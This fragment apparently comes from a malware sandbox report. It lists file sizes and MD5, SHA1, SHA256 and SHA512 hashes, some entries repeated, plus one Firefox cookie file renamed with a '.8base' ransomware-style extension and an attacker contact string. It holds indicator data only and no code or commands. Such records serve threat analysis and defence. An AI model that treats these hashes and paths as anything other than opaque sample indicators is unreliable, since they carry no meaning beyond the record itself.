SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ddwqx74p.default-release\cookies.sqlite.id[4FB2A4D5-3483].[[email protected]].8base
Filesize96KB
MD5077df49bbf6f9f33fcc2e3ae14d7cbff
SHA152e208c2555e81eb6649a70ac695619006a209cf
SHA2563efc22511a55d7a4d6121d92763e25f1d014b7e514f25922a3aeeab00aa63eaa
SHA5127727bb8299d532185ea5549cd84a0304a67b8552b91de5c2b26b1e75f891026643e729605ac8eaba465e80e1725acc64113a4701910fedd3f2d421b6908cb361